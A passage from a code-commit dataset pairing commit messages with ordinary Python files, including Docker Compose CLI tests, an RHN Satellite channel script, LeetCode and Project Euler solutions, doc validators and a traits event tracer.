("stripe_plan_id", models.CharField(max_length=32)),
("trial_days", models.IntegerField(default=0)),
],
)
]
| Python | 0 | |
886328640f5665c337bb9dd1f065cc0e350364f0 | Convert some cli tests to pytest. | tests/unit/cli/main_test.py | tests/unit/cli/main_test.py | from __future__ import absolute_import
from __future__ import unicode_literals
import logging
import pytest
from compose import container
from compose.cli.errors import UserError
from compose.cli.formatter import ConsoleWarningFormatter
from compose.cli.main import build_log_printer
from compose.cli.main import convergence_strategy_from_opts
from compose.cli.main import setup_console_handler
from compose.service import ConvergenceStrategy
from tests import mock
def mock_container(service, number):
return mock.create_autospec(
container.Container,
service=service,
number=number,
name_without_project='{0}_{1}'.format(service, number))
@pytest.fixture
def logging_handler():
stream = mock.Mock()
stream.isatty.return_value = True
return logging.StreamHandler(stream=stream)
class TestCLIMainTestCase(object):
def test_build_log_printer(self):
containers = [
mock_container('web', 1),
mock_container('web', 2),
mock_container('db', 1),
mock_container('other', 1),
mock_container('another', 1),
]
service_names = ['web', 'db']
log_printer = build_log_printer(containers, service_names, True, False, {'follow': True})
assert log_printer.containers == containers[:3]
def test_build_log_printer_all_services(self):
containers = [
mock_container('web', 1),
mock_container('db', 1),
mock_container('other', 1),
]
service_names = []
log_printer = build_log_printer(containers, service_names, True, False, {'follow': True})
assert log_printer.containers == containers
class TestSetupConsoleHandlerTestCase(object):
def test_with_tty_verbose(self, logging_handler):
setup_console_handler(logging_handler, True)
assert type(logging_handler.formatter) == ConsoleWarningFormatter
assert '%(name)s' in logging_handler.formatter._fmt
assert '%(funcName)s' in logging_handler.formatter._fmt
def test_with_tty_not_verbose(self, logging_handler):
setup_console_handler(logging_handler, False)
assert type(logging_handler.formatter) == ConsoleWarningFormatter
assert '%(name)s' not in logging_handler.formatter._fmt
assert '%(funcName)s' not in logging_handler.formatter._fmt
def test_with_not_a_tty(self, logging_handler):
logging_handler.stream.isatty.return_value = False
setup_console_handler(logging_handler, False)
assert type(logging_handler.formatter) == logging.Formatter
class TestConvergeStrategyFromOptsTestCase(object):
def test_invalid_opts(self):
options = {'--force-recreate': True, '--no-recreate': True}
with pytest.raises(UserError):
convergence_strategy_from_opts(options)
def test_always(self):
options = {'--force-recreate': True, '--no-recreate': False}
assert (
convergence_strategy_from_opts(options) ==
ConvergenceStrategy.always
)
def test_never(self):
options = {'--force-recreate': False, '--no-recreate': True}
assert (
convergence_strategy_from_opts(options) ==
ConvergenceStrategy.never
)
def test_changed(self):
options = {'--force-recreate': False, '--no-recreate': False}
assert (
convergence_strategy_from_opts(options) ==
ConvergenceStrategy.changed
)
| from __future__ import absolute_import
from __future__ import unicode_literals
import logging
from compose import container
from compose.cli.errors import UserError
from compose.cli.formatter import ConsoleWarningFormatter
from compose.cli.main import build_log_printer
from compose.cli.main import convergence_strategy_from_opts
from compose.cli.main import setup_console_handler
from compose.service import ConvergenceStrategy
from tests import mock
from tests import unittest
def mock_container(service, number):
return mock.create_autospec(
container.Container,
service=service,
number=number,
name_without_project='{0}_{1}'.format(service, number))
class CLIMainTestCase(unittest.TestCase):
def test_build_log_printer(self):
containers = [
mock_container('web', 1),
mock_container('web', 2),
mock_container('db', 1),
mock_container('other', 1),
mock_container('another', 1),
]
service_names = ['web', 'db']
log_printer = build_log_printer(containers, service_names, True, False, {'follow': True})
self.assertEqual(log_printer.containers, containers[:3])
def test_build_log_printer_all_services(self):
containers = [
mock_container('web', 1),
mock_container('db', 1),
mock_container('other', 1),
]
service_names = []
log_printer = build_log_printer(containers, service_names, True, False, {'follow': True})
self.assertEqual(log_printer.containers, containers)
class SetupConsoleHandlerTestCase(unittest.TestCase):
def setUp(self):
self.stream = mock.Mock()
self.stream.isatty.return_value = True
self.handler = logging.StreamHandler(stream=self.stream)
def test_with_tty_verbose(self):
setup_console_handler(self.handler, True)
assert type(self.handler.formatter) == ConsoleWarningFormatter
assert '%(name)s' in self.handler.formatter._fmt
assert '%(funcName)s' in self.handler.formatter._fmt
def test_with_tty_not_verbose(self):
setup_console_handler(self.handler, False)
assert type(self.handler.formatter) == ConsoleWarningFormatter
assert '%(name)s' not in self.handler.formatter._fmt
assert '%(funcName)s' not in self.handler.formatter._fmt
def test_with_not_a_tty(self):
self.stream.isatty.return_value = False
setup_console_handler(self.handler, False)
assert type(self.handler.formatter) == logging.Formatter
class ConvergeStrategyFromOptsTestCase(unittest.TestCase):
def test_invalid_opts(self):
options = {'--force-recreate': True, '--no-recreate': True}
with self.assertRaises(UserError):
convergence_strategy_from_opts(options)
def test_always(self):
options = {'--force-recreate': True, '--no-recreate': False}
self.assertEqual(
convergence_strategy_from_opts(options),
ConvergenceStrategy.always
)
def test_never(self):
options = {'--force-recreate': False, '--no-recreate': True}
self.assertEqual(
convergence_strategy_from_opts(options),
ConvergenceStrategy.never
)
def test_changed(self):
options = {'--force-recreate': False, '--no-recreate': False}
self.assertEqual(
convergence_strategy_from_opts(options),
ConvergenceStrategy.changed
)
| Python | 0.999992 |
4db13bdab18934bebcfe5b102044f936e0eab892 | Add a place to put random stuff and a list of components as a python module. | etc/component_list.py | etc/component_list.py | COMPONENTS = [
"AdaBoost",
"AutoInvert",
"AutoMlpClassifier",
"BiggestCcExtractor",
"BinarizeByHT",
"BinarizeByOtsu",
"BinarizeByRange",
"BinarizeBySauvola",
"BitDataset",
"BitNN",
"BookStore",
"CascadedMLP",
"CenterFeatureMap",
"ConnectedComponentSegmenter",
"CurvedCutSegmenter",
"CurvedCutWithCcSegmenter",
"Degradation",
"DeskewGrayPageByRAST",
"DeskewPageByRAST",
"DocClean",
"DpSegmenter",
"EnetClassifier",
"EuclideanDistances",
"KnnClassifier",
"LatinClassifier",
"Linerec",
"LinerecExtracted",
"MetaLinerec",
"NullLinerec",
"OcroFST",
"OldBookStore",
"PageFrameRAST",
"Pages",
"RaggedDataset8",
"RaveledExtractor",
"RmBig",
"RmHalftone",
"RmUnderline",
"RowDataset8",
"ScaledImageExtractor",
"SegmentLineByCCS",
"SegmentLineByGCCS",
"SegmentLineByProjection",
"SegmentPageBy1CP",
"SegmentPageByMorphTrivial",
"SegmentPageByRAST",
"SegmentPageByRAST1",
"SegmentPageByVORONOI",
"SegmentPageByXYCUTS",
"SegmentWords",
"SimpleFeatureMap",
"SimpleGrouper",
"SkelSegmenter",
"SmartBookStore",
"SqliteBuffer",
"SqliteDataset",
"StandardExtractor",
"StandardGrouper",
"StandardPreprocessing",
"TextImageSegByLogReg",
"adaboost",
"biggestcc",
"bitdataset",
"bitnn",
"cfmap",
"cmlp",
"dpseg",
"edist",
"enet",
"knn",
"latin",
"linerec",
"linerec_extracted",
"mappedmlp",
"metalinerec",
"mlp",
"nulllinerec",
"raggeddataset8",
"raveledfe",
"rowdataset8",
"scaledfe",
"sfmap",
"simplegrouper",
"sqlitebuffer",
"sqliteds",
]
| Python | 0 | |
f7aeb7a708ef2e40546d27d480073fdc113d639e | Add check_babel_syntax ; see note below | unnaturalcode/check_babel_syntax.py | unnaturalcode/check_babel_syntax.py | #!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
# Takes in a string of JavaScript code and checks for errors
# NOTE: FOR BABEL
import os
import subprocess
import sys
import tempfile
from compile_error import CompileError
# Method for finding index of certain characters in a string, n being the n'th occurence of the character/string
def find_nth(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+len(needle))
n -= 1
return start
# Main method
def checkBabelSyntax(src):
myFile = open("toCheck.js", "w")
myFile.write(src)
myFile.close()
proc = subprocess.Popen(['node_modules/.bin/babel', 'toCheck.js', '-o', '/dev/null'], stderr=subprocess.PIPE)
streamdata, err = proc.communicate()
rc = proc.returncode
if rc == 0:
# No errors, all good
os.remove("toCheck.js")
return None
else:
# Error, disect data for constructor
colonFirInd = find_nth(err, ':', 1)
colonSecInd = find_nth(err, ':', 2)
colonThirInd = find_nth(err, ':', 3)
lineBegin = find_nth(err, '(', 1)
lineEnd = find_nth(err, ')', 1)
fileName = err[colonFirInd+2:colonSecInd]
line = int(err[lineBegin+1:colonThirInd])
column = int(err[colonThirInd+1:lineEnd])
errorname = err[0:colonFirInd]
flagStart = find_nth(err, '>', 1)
temp = err[flagStart:]
ind = find_nth(temp, '\n', 1)
textBefore = err[colonSecInd+2:lineBegin-1]
textAfter = err[flagStart+26:flagStart+ind]
text = textBefore + ' ' + textAfter
errorObj = CompileError(fileName, line, column, None, text, errorname)
os.remove("toCheck.js")
return [errorObj]
| Python | 0 | |
3196eeb928c5715ba20d21d0d16a3087938bf6c9 | Add tools/compute_bottleneck.py. | tools/compute_bottleneck.py | tools/compute_bottleneck.py | #!/usr/bin/env python
#
# Copyright 2016 The Open Images Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# This script takes an Inception v3 checkpoint, runs the classifier
# on the image and prints the values from the bottleneck layer.
# Example:
# $ wget -O /tmp/cat.jpg https://farm6.staticflickr.com/5470/9372235876_d7d69f1790_b.jpg
# $ ./tools/compute_bottleneck.py /tmp/cat.jpg
#
# Make sure to download the ANN weights and support data with:
# $ ./tools/download_data.sh
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import math
import sys
import os.path
import numpy as np
import tensorflow as tf
from tensorflow.contrib.slim.python.slim.nets import inception
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.training import saver as tf_saver
from tensorflow.python.training import supervisor
slim = tf.contrib.slim
FLAGS = None
def PreprocessImage(image_path):
"""Load and preprocess an image.
Args:
image_path: path to an image
Returns:
An ops.Tensor that produces the preprocessed image.
"""
if not os.path.exists(image_path):
tf.logging.fatal('Input image does not exist %s', image_path)
img_data = tf.gfile.FastGFile(image_path).read()
# Decode Jpeg data and convert to float.
img = tf.cast(tf.image.decode_jpeg(img_data, channels=3), tf.float32)
# Make into a 4D tensor by setting a 'batch size' of 1.
img = tf.expand_dims(img, [0])
img = tf.image.crop_and_resize(
img,
# Whole image
tf.constant([0, 0, 1.0, 1.0], shape=[1, 4]),
# One box
tf.constant([0], shape=[1]),
# Target size is image_size x image_size
tf.constant([FLAGS.image_size, FLAGS.image_size], shape=[2]))
# Center the image about 128.0 (which is done during training) and normalize.
img = tf.mul(img, 1.0/127.5)
return tf.sub(img, 1.0)
def main(args):
if not os.path.exists(FLAGS.checkpoint):
tf.logging.fatal(
'Checkpoint %s does not exist. Have you download it? See tools/download_data.sh',
FLAGS.checkpoint)
g = tf.Graph()
with g.as_default():
input_image = PreprocessImage(FLAGS.image_path[0])
with slim.arg_scope(inception.inception_v3_arg_scope()):
logits, end_points = inception.inception_v3(
input_image, num_classes=FLAGS.num_classes, is_training=False)
bottleneck = end_points['PreLogits']
init_op = control_flow_ops.group(variables.initialize_all_variables(),
variables.initialize_local_variables(),
data_flow_ops.initialize_all_tables())
saver = tf_saver.Saver()
sess = tf.Session()
saver.restore(sess, FLAGS.checkpoint)
# Run the evaluation on the image
bottleneck_eval = np.squeeze(sess.run(bottleneck))
first = True
for val in bottleneck_eval:
if not first:
sys.stdout.write(",")
first = False
sys.stdout.write('{:.3f}'.format(val))
sys.stdout.write('\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--checkpoint', type=str, default='data/2016_08/model.ckpt',
help='Checkpoint to run inference on.')
parser.add_argument('--image_size', type=int, default=299,
help='Image size to run inference on.')
parser.add_argument('--num_classes', type=int, default=6012,
help='Number of output classes.')
parser.add_argument('image_path', nargs=1, default='')
FLAGS = parser.parse_args()
tf.app.run()
| Python | 0 | |
d7568806a81c52f268673422dbbe60117f4b490c | Add plugins test cases | tests/test_plugin.py | tests/test_plugin.py | from rest_framework import status
from rest_framework.test import APITestCase
from django.contrib.auth import get_user_model
from api_bouncer.models import Api
User = get_user_model()
class ConsumerKeyTests(APITestCase):
def setUp(self):
self.superuser = User.objects.create_superuser(
'john',
'john@localhost.local',
'john123john'
)
self.user = User.objects.create_user(
'jane',
'jane@localhost.local',
'jane123jane'
)
self.example_api = Api.objects.create(
name='example-api',
hosts=['example.com'],
upstream_url='https://httpbin.org'
)
self.url = '/apis/{}/plugins/'
def test_api_add_plugin(self):
"""
Ensure we can add a plugin to an api as superusers.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
def test_api_add_plugin_403(self):
"""
Ensure we can add a plugin to an api only as superusers.
"""
self.client.login(username='jane', password='jane123jane')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_api_add_plugin_wrong_name(self):
"""
Ensure we can't add a plugin to an api that doesn't exist.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'na-ah',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data['errors'], 'Invalid plugin name')
def test_api_add_plugin_modify_partially_config(self):
"""
Ensure we can partially modify a plugin configuration.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
expected_res = response.data
expected_res['config'].update({'anonymous': 'citizen-four'})
data.update({'config': {'anonymous': 'citizen-four'}})
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(response.data, expected_res)
def test_api_add_plugin_no_extra_keys(self):
"""
Ensure we can't add arguments not defined on plugin's schema.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
data.update({'config': {'you_shall_not_pass': True}})
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| Python | 0.000001 | |
b29fe95eb2cb86a7ae9170fbf8ceb2533bc84578 | Add the photo.index module (with minimal functionality so far). | photo/index.py | photo/index.py | """Provide the class Index which represents an index of photos.
"""
import os
import os.path
import fnmatch
from collections import MutableSequence
import yaml
class Index(MutableSequence):
defIdxFilename = ".index.yaml"
def __init__(self, idxfile=None, imgdir=None):
super(Index, self).__init__()
self.directory = None
self.idxfilename = None
self.items = []
if idxfile:
self.read(idxfile)
elif imgdir:
self.readdir(imgdir)
def __len__(self):
return len(self.items)
def __getitem__(self, index):
return self.items.__getitem__(index)
def __setitem__(self, index, value):
self.items.__setitem__(index, value)
def __delitem__(self, index):
self.items.__delitem__(index)
def insert(self, index, value):
self.items.insert(index, value)
def _idxfilename(self, idxfile):
"""Determine the index file name for reading and writing.
"""
if idxfile is not None:
return os.path.abspath(idxfile)
elif self.idxfilename is not None:
return self.idxfilename
else:
d = self.directory if self.directory is not None else os.getcwd()
return os.path.abspath(os.path.join(d, self.defIdxFilename))
def readdir(self, imgdir):
"""Create a new index of all image files in a directory.
"""
self.directory = os.path.abspath(imgdir)
self.items = []
for f in sorted(os.listdir(self.directory)):
if (os.path.isfile(os.path.join(self.directory,f)) and
fnmatch.fnmatch(f, '*.jpg')):
self.items.append({'filename':f, 'tags':[]})
def read(self, idxfile=None):
"""Read the index from a file.
"""
self.idxfilename = self._idxfilename(idxfile)
self.directory = os.path.dirname(self.idxfilename)
with open(self.idxfilename, 'rt') as f:
self.items = yaml.load(f)
def write(self, idxfile=None):
"""Write the index to a file.
"""
self.idxfilename = self._idxfilename(idxfile)
self.directory = os.path.dirname(self.idxfilename)
with open(self.idxfilename, 'wt') as f:
yaml.dump(self.items, f, default_flow_style=False)
| Python | 0 | |
eff993eac0924299cd273d0c582e24c57f2c4a84 | Add 263-ugly-number.py | 263-ugly-number.py | 263-ugly-number.py | """
Question:
Ugly Number
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and creating all test cases.
Performance:
1. Total Accepted: 19816 Total Submissions: 60714 Difficulty: Easy
2. Your runtime beats 60.64% of python submissions.
"""
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num == 0:
return False
for ugly_divisor in [2, 3, 5]:
while (num % ugly_divisor) == 0:
num /= ugly_divisor
return num == 1
assert Solution().isUgly(0) is False
assert Solution().isUgly(1) is True
assert Solution().isUgly(2) is True
assert Solution().isUgly(3) is True
assert Solution().isUgly(4) is True
assert Solution().isUgly(5) is True
assert Solution().isUgly(6) is True
assert Solution().isUgly(7) is False
assert Solution().isUgly(8) is True
assert Solution().isUgly(9) is True
assert Solution().isUgly(10) is True
assert Solution().isUgly(11) is False
assert Solution().isUgly(12) is True
assert Solution().isUgly(14) is False
assert Solution().isUgly(-2147483648) is False
| Python | 0.999999 | |
063096a5b52945666ec2d61bfe5201ad53461614 | Create rhn-channel-add-scl.py | rhn-channel-add-scl.py | rhn-channel-add-scl.py | #!/usr/bin/python
import xmlrpclib
import sys, array
"""RHN Satellite API setup"""
SATELLITE_URL = "https://rhn.domain.tld/rpc/api"
SATELLITE_LOGIN = "username"
SATELLITE_PASSWORD = "password"
"""If the user didn't specify any hosts, show usage."""
if len(sys.argv) < 2:
sys.exit("Usage:\n\t"+sys.argv[0]+" <hostname> [hostname] ...")
"""Connect to RHN Satellite API"""
client = xmlrpclib.Server(SATELLITE_URL, verbose=0)
key = client.auth.login(SATELLITE_LOGIN, SATELLITE_PASSWORD)
# systems we will add channel to
ids = array.array('i')
# channel we will add to systems
to_add = ''
for hostname in sys.argv[1:]:
"""
Assume every argument is a hostname.
Search my RHN Satellite systems for any
system whose hostname starts with any
the arguments given.
Takes the IDs of all found systems and
stores them in a (global) variable.
"""
# get a list of all systems that have this hostname
systems = client.system.search.hostname(key, hostname)
# add these system's ids to the list of global ids
for system in systems:
ids.append(system['id'])
if len(ids) != 0:
"""
If systems were found, get the first
one and find the name of the SCL
channel.
Otherwise, throw an error and exit.
"""
# try to find SCL in the list of channels this system is
# NOT currently subscribed to
channels = client.system.listSubscribableChildChannels(key, ids[0])
for channel in channels:
"""
Search through all returned channels for
the SCL channel and save its name.
"""
if channel['label'].find('scl-') != -1:
to_add = channel['label']
break
if len(to_add) < 2:
"""
If the channel was not found, try to find SCL in the list
of channels this system IS subscribed to. The API
doesn't allow listing of all channels associated with a sys.
"""
channels = client.system.listSubscribedChildChannels(key, ids[0])
for channel in channels:
"""
Search through all returned channels for
the SCL channel and save its name.
"""
if channel['label'].find('scl-') != -1:
to_add = channel['label']
break
else:
sys.stderr.write('No systems were found')
exit(1)
for id in ids:
"""
Add the SCL channel to every system found above.
"""
# need to get all subscribed channels first
# since setChildChannels is absolute.
current_channels = client.system.listSubscribedChildChannels(key, id)
# create an array of the channels system will be subscribed to
# and include existing channels.
channels = []
for channel in current_channels:
channels.append(channel['label'])
for channel in channels:
# if the channel to be added already exists, don't double add
if channel == to_add:
break
else:
# if the channel doesn't already exist, add it!
channels.append(to_add)
# finally, set all those channels as the current subscriptions
client.system.setChildChannels(key, id, channels)
# write a success message
print("\033[1;32mSuccess:\033[1;m\nSystem "+str(id)+": "+str(channels))
"""Kill the connection to RHN"""
client.auth.logout(key)
| Python | 0.000002 | |
cd44e4a62e8c8f8ddba0634ccc0bb157f7745726 | add 129 | vol3/129.py | vol3/129.py | def A(n):
if n % 5 == 0:
return 1
x = 1
ret = 1
while x != 0:
x = (x * 10 + 1) % n
ret += 1
return ret
if __name__ == "__main__":
LIMIT = 10 ** 6
i = LIMIT + 1
while A(i) <= LIMIT:
i += 2
print i
| Python | 0.999994 | |
a8663257ad4b4d0688c54d0e94949ab602c61561 | allow validation for empty/missing @brief. | util/py_lib/seqan/dox/validation.py | util/py_lib/seqan/dox/validation.py | #!/usr/env/bin python
"""Some validation for proc_doc.Proc*"""
__author__ = 'Manuel Holtgrewe <manuel.holtgrewe@fu-berlin.de>'
class ProcDocValidator(object):
"""Validate proc_doc.Proc* objects.
Implements the visitor pattern.
"""
def __init__(self, msg_printer):
self.msg_printer = msg_printer
def validate(self, proc_entry):
return
class MissingSignatureValidator(ProcDocValidator):
"""Validates for missing or empty signature."""
def validate(self, proc_entry):
IGNORED = ['variable', 'member_variable', 'tag', 'grouped_tag', 'typedef',
'grouped_typedef', 'signature', 'concept', 'member_typedef',
'enum', 'grouped_enum']
if not hasattr(proc_entry, 'signatures') or proc_entry.kind in IGNORED:
return # Skip if type has no signatures.
if not proc_entry.signatures:
msg = 'Missing @signature for this entry!'
self.msg_printer.printTokenError(proc_entry.raw.first_token, msg, 'warning')
class MissingParameterDescriptionValidator(ProcDocValidator):
"""Warns if the description is missing for a @param or @return."""
def validate(self, proc_entry):
if not hasattr(proc_entry, 'params') and \
not hasattr(proc_entry, 'tparams') and \
not hasattr(proc_entry, 'returns'):
return # Skip if type has no parameters
# Check for empty name.
for key in ['params', 'tparams', 'returns']:
if not hasattr(proc_entry, key):
continue # Skip if missing.
for val in getattr(proc_entry, key):
if hasattr(val, 'name') and not val.name:
msg = 'Missing name for @%s' % key[:-1]
elif hasattr(val, 'type') and not val.type:
msg = 'Missing type for @%s' % key[:-1]
else:
continue # skip
self.msg_printer.printTokenError(val.raw.first_token, msg, 'warning')
# Check for empty description.
for key in ['params', 'tparams', 'returns']:
if not hasattr(proc_entry, key):
continue # Skip if missing.
for val in getattr(proc_entry, key):
if val.desc.empty:
msg = 'Missing description for @%s' % key[:-1]
self.msg_printer.printTokenError(val.raw.first_token, msg, 'warning')
class ReturnVoidValidator(ProcDocValidator):
"""Warns if there is a (superflous) @return void entry."""
def validate(self, proc_entry):
if not hasattr(proc_entry, 'returns'):
return # Skip if type has no returns member.
for r in proc_entry.returns:
if r.type == 'void':
msg = '@return superflous for "void" type -- simply show "void" in signature.'
self.msg_printer.printTokenError(r.raw.first_token, msg, 'warning')
class EmptyBriefValidator(ProcDocValidator):
"""Warns if there is no non-empty @brief section for an entry."""
def validate(self, proc_entry):
IGNORED = ['mainpage', 'page']
if proc_entry.kind in IGNORED:
return # Skip.
if not hasattr(proc_entry, 'brief'):
return # Skip if type has no returns member.
if not proc_entry.brief or proc_entry.brief.empty:
msg = 'Missing non-empty @brief clause.'
self.msg_printer.printTokenError(proc_entry.raw.first_token, msg, 'warning')
# Array with the validator classes to use.
VALIDATORS = [MissingSignatureValidator,
MissingParameterDescriptionValidator,
ReturnVoidValidator,
EmptyBriefValidator]
| #!/usr/env/bin python
"""Some validation for proc_doc.Proc*"""
__author__ = 'Manuel Holtgrewe <manuel.holtgrewe@fu-berlin.de>'
class ProcDocValidator(object):
"""Validate proc_doc.Proc* objects.
Implements the visitor pattern.
"""
def __init__(self, msg_printer):
self.msg_printer = msg_printer
def validate(self, proc_entry):
return
class MissingSignatureValidator(ProcDocValidator):
"""Validates for missing or empty signature."""
def validate(self, proc_entry):
IGNORED = ['variable', 'member_variable', 'tag', 'grouped_tag', 'typedef',
'grouped_typedef', 'signature', 'concept', 'member_typedef',
'enum', 'grouped_enum']
if not hasattr(proc_entry, 'signatures') or proc_entry.kind in IGNORED:
return # Skip if type has no signatures.
if not proc_entry.signatures:
msg = 'Missing @signature for this entry!'
self.msg_printer.printTokenError(proc_entry.raw.first_token, msg, 'warning')
class MissingParameterDescriptionValidator(ProcDocValidator):
"""Warns if the description is missing for a @param or @return."""
def validate(self, proc_entry):
if not hasattr(proc_entry, 'params') and \
not hasattr(proc_entry, 'tparams') and \
not hasattr(proc_entry, 'returns'):
return # Skip if type has no parameters
# Check for empty name.
for key in ['params', 'tparams', 'returns']:
if not hasattr(proc_entry, key):
continue # Skip if missing.
for val in getattr(proc_entry, key):
if hasattr(val, 'name') and not val.name:
msg = 'Missing name for @%s' % key[:-1]
elif hasattr(val, 'type') and not val.type:
msg = 'Missing type for @%s' % key[:-1]
else:
continue # skip
self.msg_printer.printTokenError(val.raw.first_token, msg, 'warning')
# Check for empty description.
for key in ['params', 'tparams', 'returns']:
if not hasattr(proc_entry, key):
continue # Skip if missing.
for val in getattr(proc_entry, key):
if val.desc.empty:
msg = 'Missing description for @%s' % key[:-1]
self.msg_printer.printTokenError(val.raw.first_token, msg, 'warning')
class ReturnVoidValidator(ProcDocValidator):
"""Warns if there is a (superflous) @return void entry."""
def validate(self, proc_entry):
if not hasattr(proc_entry, 'returns'):
return # Skip if type has no returns member.
for r in proc_entry.returns:
if r.type == 'void':
msg = '@return superflous for "void" type -- simply show "void" in signature.'
self.msg_printer.printTokenError(r.raw.first_token, msg, 'warning')
# Array with the validator classes to use.
VALIDATORS = [MissingSignatureValidator,
MissingParameterDescriptionValidator,
ReturnVoidValidator]
| Python | 0 |
e1087ac3c07e5b25c1f60ef82e8785973fa5bb79 | add an event_tracer module | traits/util/event_tracer.py | traits/util/event_tracer.py | # This software is OSI Certified Open Source Software.
# OSI Certified is a certification mark of the Open Source Initiative.
#
# Copyright (c) 2013, Enthought, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Enthought, Inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Multi-threaded trait event tracer.
Place this script somewhere importable
(e.g. C:\\Python27\\Lib\\site-packages\\).
Use it as follows::
>>> from trace_recorder import record_events
>>> with record_events('C:\\dev\\trace'):
... my_model.some_trait = True
This will install a tracer that will record all events that occur from
setting of some_trait on the my_model instance.
The results will be stored in one file per running thread in the
directory 'C:\\dev\\trace'. The files are named after the thread being
traced.
"""
from contextlib import contextmanager
import inspect
import os
import threading
from datetime import datetime
from traits import trait_notifiers
CHANGEMSG = (
u"{time} {direction:-{direction}{length}} '{name}' changed from "
u"{old} to {new} in '{class_name}'\n")
CALLINGMSG = (
u"{time} {action:>{gap}}: '{handler}' in {source}\n")
EXITMSG = u"{direction:-{direction}{length}} EXIT: '{handler}'{exception}\n"
class ChangeEventRecorder(object):
""" A thread aware trait change recorder
The class manages multiple ThreadChangeEventRecorders which record
trait change events for each thread in a separate file.
"""
def __init__(self, trace_directory):
""" Object constructor
Parameters
----------
trace_directory : string
The directory where the change log for each thread will be saved
"""
self.tracers = {}
self.tracer_lock = threading.Lock()
self.trace_directory = trace_directory
def close(self):
""" Close log files.
"""
with self.tracer_lock:
tracers = self.tracers
self.tracers = {}
for tracer in tracers.values():
tracer.fh.close()
def pre_tracer(self, obj, name, old, new, handler):
""" The traits pre event tracer.
This method should be set as the global pre event tracer for traits.
"""
tracer = self._get_tracer()
tracer.pre_tracer(obj, name, old, new, handler)
def post_tracer(self, obj, name, old, new, handler, exception=None):
""" The traits post event tracer.
This method should be set as the global post event tracer for traits.
"""
tracer = self._get_tracer()
tracer.post_tracer(obj, name, old, new, handler, exception=exception)
def _get_tracer(self):
with self.tracer_lock:
thread = threading.current_thread().name
if thread not in self.tracers:
filename = os.path.join(self.trace_directory,
'{}.trace'.format(thread))
fh = open(filename, 'wb')
